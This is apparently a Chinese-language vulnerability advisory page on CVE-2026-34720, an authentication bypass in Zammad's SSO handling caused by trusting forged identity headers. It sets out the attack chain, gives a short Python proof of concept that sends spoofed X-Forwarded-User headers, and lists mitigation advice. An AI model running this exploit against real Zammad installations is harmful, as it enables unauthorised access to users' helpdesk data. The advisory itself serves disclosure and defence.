IPBUF安全漏洞报告
English
CVE-2026-34720 CVSS 4.3 中危

CVE-2026-34720 Zammad SSO认证绕过漏洞

披露日期: 2026-04-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34720
漏洞类型
认证绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Zammad

相关标签

认证绕过SSOZammadHeader InjectionCVE-2026-34720

漏洞概述

Zammad是一个基于Web的开源帮助台系统。在7.0.1和6.5.4版本之前,其SSO机制存在安全缺陷,未验证特定头部是否源自受信任的SSO代理或网关便直接执行操作。攻击者可利用此漏洞伪造身份信息,绕过正常认证流程,以低权限用户身份访问系统,导致敏感信息泄露。

技术细节

该漏洞的核心在于Zammad处理单点登录(SSO)请求时的逻辑缺陷。通常,反向代理或SSO网关会在转发请求时添加特定的HTTP头部(如X-Remote-User)来标识经过认证的用户。受影响的Zammad版本直接信任这些头部信息,而没有校验请求的来源是否为合法的内部代理。攻击者无需有效的会话Cookie,只需构造并发送包含恶意用户身份头部的HTTP请求即可。由于CVSS向量显示攻击无需用户交互(UI:N)且攻击复杂度低(AC:L),远程攻击者可轻易利用此漏洞以任意用户身份(特别是低权限用户)登录系统并读取受限数据。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统运行的是Zammad,且版本低于7.0.1或6.5.4。
STEP 2
构造恶意请求
攻击者构造一个HTTP请求,在头部中插入用于SSO身份识别的字段(如X-Forwarded-User),并将其值设置为想要冒充的用户名。
STEP 3
发送请求
攻击者将构造好的恶意请求发送给Zammad应用程序。
STEP 4
认证绕过
Zammad接收到请求后,由于未验证头部的来源是否为受信任的代理,直接信任了头部中的用户信息。
STEP 5
获取访问权限
攻击者成功绕过身份验证,以伪造的用户身份(通常是低权限用户)登录系统,获取对应的数据访问权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Proof of Concept for CVE-2026-34720 # Description: Exploits lack of header verification in Zammad SSO mechanism to bypass authentication. target_url = "http://vulnerable-zammad-instance.com" # Common headers that might be trusted by the vulnerable SSO configuration # The actual header name depends on the specific configuration (e.g., X-Forwarded-User, X-Remote-User) headers = { "User-Agent": "PoC-Client/1.0", "X-Forwarded-User": "attacker", # Attempting to impersonate user 'attacker' "X-Forwarded-Email": "[email protected]" } try: response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check if the response indicates a successful login as the forged user.") # Analyze response cookies or body content to confirm authentication bypass else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Zammad < 7.0.1
Zammad < 6.5.4

防御指南

临时缓解措施
如果无法立即升级,建议在应用防火墙(WAF)或反向代理上配置规则,拦截来自非受信任IP地址的包含SSO相关头部的请求。同时,检查Zammad的配置,确保没有启用未经授权的SSO机制,并禁用不必要的头部转发功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表